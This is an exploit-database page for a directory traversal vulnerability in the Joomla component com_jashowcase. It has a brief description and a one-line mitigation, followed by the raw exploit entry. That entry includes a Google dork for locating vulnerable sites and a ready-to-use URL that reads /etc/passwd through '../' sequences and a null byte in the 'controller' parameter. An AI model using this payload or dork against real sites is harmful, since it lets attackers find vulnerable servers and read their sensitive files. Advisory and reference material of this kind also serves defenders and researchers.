header-logo
Suggest Exploit
vendor:
com_jashowcase
by:
FL0RiX
7,5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: com_jashowcase
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_jashowcase

A directory traversal vulnerability exists in Joomla Component com_jashowcase. An attacker can exploit this vulnerability to read sensitive files on the server. The vulnerability is due to insufficient sanitization of user-supplied input to the 'controller' parameter of the 'index.php' script. An attacker can send a specially crafted HTTP request containing directory traversal sequences (e.g. '../../../../../../etc/passwd%00') to read sensitive files on the server.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in file operations.
Source

Exploit-DB raw data:

@~~=======================================~~@
@~~=Script : Joomla Component com_jashowcase

@~~=Author : FL0RiX

@~~=Greez : Deep-Power ,Pyske,Wretch-x & All Friends

@~~=Bug Type : Directory Traversal

@~~=Dork : inurl:"com_jashowcase "

@~~=Note : Kimseye Hakettiginden Fazla Deger Vermeyecekmissin..!!

@~~=======================================~~@

@~~=Vuln.

: http://site/ [Yol] /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00